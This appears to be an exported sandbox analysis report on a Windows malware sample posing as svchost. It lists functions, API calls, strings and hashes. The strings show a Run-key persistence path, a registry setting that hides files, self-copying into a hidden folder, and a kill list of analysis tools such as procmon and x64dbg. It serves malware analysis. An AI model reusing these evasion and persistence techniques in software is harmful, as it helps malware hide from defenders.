                                                                                                                                                                                                                        Function 00007FF67E6D306C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30AC), ref: 00007FF67E6D3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegSetValueExW.ADVAPI32 ref: 00007FF67E6D3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegCloseKey.ADVAPI32 ref: 00007FF67E6D3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF67E6D3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E6D3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: Process32FirstW.KERNEL32 ref: 00007FF67E6D3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: wcscmp.MSVCRT ref: 00007FF67E6D3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: OpenProcess.KERNEL32 ref: 00007FF67E6D3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: TerminateProcess.KERNEL32 ref: 00007FF67E6D3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: Process32NextW.KERNEL32 ref: 00007FF67E6D3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF67E6D3ACC), ref: 00007FF67E6D39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF67E6D3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: 1aebc30a1bc7906e8e82b93b964b6387efcd46b7d0736c3852a2be56663af940
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21792BE7C94290EE00E724DC952BBA621AF74750FF00132F46DD62E69E5DE50DA600
                                                                                                                                                                                                                        Function 00007FF67E6D3DE4 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: a3b15b9640374156834b3028bfc9370c0f0fd5d92088258440e5c365a7ccc6d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF21ED36A2C98681EF70DB12E84C36B6364FBE4B54FB04235E65D865A8DF3DD548EB00
                                                                                                                                                                                                                        Function 00007FF67E6D2E9C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: 7928bc1faefc9c44e38c4b47a21e9993421fa75de17c469f87da6617e25dfb57
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE01802B92CA8282EB20DB51E85822B6371FBF9F45FB10535F98EC6664CE3DD55C9600
                                                                                                                                                                                                                        Function 00007FF67E6D3CA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: 742266597ddccf9ea966740586333b98672f5aec9c5f55ec13f77dcfc6d8ed67
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6731D87662CAC485DB70DB15E8987ABB3A0F798B40F600125EA8DC7B68DF3CD554DB00
                                                                                                                                                                                                                        Function 00007FF67E6D3A34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: wsprintfW.USER32 ref: 00007FF67E6D3862
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF67E6D3A79
                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF67E6D3A84
                                                                                                                                                                                                                        • CopyFileW.KERNEL32 ref: 00007FF67E6D3A9D
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF67E6D3AB5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 8ceb8d8f7ec87502f777b2c6a72f705e59c899ddaca8bb5fa566733616542d8b
                                                                                                                                                                                                                        • Instruction ID: 0db313bc0425e3be75b12677872e4ea97d07295e58775e0a742830c2997cc226
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ceb8d8f7ec87502f777b2c6a72f705e59c899ddaca8bb5fa566733616542d8b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2014467B2898292EF60DB24E8543AB5360FBA4744FF05432E24DC75A4EE3CD64EDB40
                                                                                                                                                                                                                        Function 00007FF67E6D3B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction ID: bd3838a626dea25fa5d904934fb4749a1b9fe863492dc47fbfc87a62e8a26328
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B01D77A628A808ADB50CB15E84471BB7A4F798794FA01225FA8D83B68DF7DC149CB00
                                                                                                                                                                                                                        Function 00007FF67E6D13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 55ca7b25fc3fba999383f4887996ef625d541d6321faecf34a0365509225a8ea
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5012C6792C606C6EA30CF21E44432B63A0FB94349FF04135E68D82A98CF7CD54DDB00
                                                                                                                                                                                                                        Function 00007FF67E6D3974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: 97431c6ab081ac76121f518a4947a93b17c1473fe495580373b0e582d075d6d7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F110336628B4086DB90CB15F44466B77A0FB947A0F605231F9AE87BE8DF7CD149DB00
                                                                                                                                                                                                                        Function 00007FF67E6D1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 982e9fddf5a000c0859b0064548dcdacc803ba8c57b988cad7921cd91eae76fd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFE0122A928A87C2DE20EF61F84436A63A0FB94744FF00131F58D82A68DF7CD54DDB00
                                                                                                                                                                                                                        Function 00007FF67E6D2F2C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4524: CreateFileW.KERNELBASE ref: 00007FF67E6D456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF67E6D2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF67E6D2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 96d02d8f53e537cfbd773ed7f0058408a3fe38fccfd467091a2057547ba61344
                                                                                                                                                                                                                        • Instruction ID: 6790ac7967057671b2dab347513304128a0864ac7e1bcd0988af8667a08a2bdd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96d02d8f53e537cfbd773ed7f0058408a3fe38fccfd467091a2057547ba61344
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D11EF2A928A8285EF20DB11F8483BB73A0FBA4B44FF00135E54CC6665DF7CD44D9740

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:6.8%
                                                                                                                                                                                                                        Total number of Nodes:351
                                                                                                                                                                                                                        Total number of Limit Nodes:13
